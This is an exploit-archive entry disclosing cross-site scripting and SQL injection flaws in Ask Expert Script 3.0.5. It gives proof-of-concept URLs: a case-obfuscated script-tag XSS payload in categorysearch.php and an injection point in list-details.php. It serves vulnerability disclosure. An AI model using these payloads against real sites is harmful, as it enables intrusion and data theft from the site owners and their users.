Ask expert script 3.0.5 cross site scripting / sql injection Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2019-02-19 | Type : webapps | Platform : php
This exploit / vulnerability Ask expert script 3.0.5 cross site scripting / sql injection is for educational purposes only and if it is used you will do on your own risk!


[+] Code ...

# Exploit Title: Ask Expert Script 3.0.5 - Cross Site Scripting / SQL Injection
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: February 19, 2019
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link : https://www.phpscriptsmall.com/product/ask-expert-script/
# Tested Version: 3.0.5
# Tested on: Kali linux, Windows 8.1


# PoC:

# Cross Site Scripting:

# http://localhost/[PATH]/categorysearch.php?cateid=[XSS]
# http://localhost/[PATH]/categorysearch.php?cateid=<scRiPt>alert(1)</ScrIpT>

# SQL Injection:

# http://localhost/[PATH]/list-details.php?view=[SQL]